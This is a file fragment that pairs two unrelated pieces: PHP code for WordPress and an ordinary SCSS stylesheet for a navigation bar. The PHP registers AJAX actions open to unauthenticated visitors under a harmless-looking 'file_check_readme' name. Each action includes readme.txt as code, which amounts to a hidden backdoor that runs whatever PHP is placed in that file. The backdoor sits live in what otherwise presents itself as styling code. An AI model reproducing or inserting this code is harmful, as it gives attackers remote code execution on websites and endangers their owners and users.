if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
.navbar-nav { font-weight: bold; } .navbar-nav .icon { vertical-align: middle; margin-#{$right}: 0.1em; } .navbar-nav .nav-item { border-bottom: 1pt solid black; &.active .nav-link { margin: 0; background-color: $body-bg; padding: 2px 4px; } } .navbar-nav .nav-link { margin: 2px 2px 0; padding: 2px 2px 0; background-color: $bg-one; border-color: $bg-two; border-style: solid; border-width: 1pt 1pt 0 1pt; border-radius: 0.4em 0.4em 0 0; &:hover { margin: 0; background-color: $body-bg; padding: 2px 4px; } }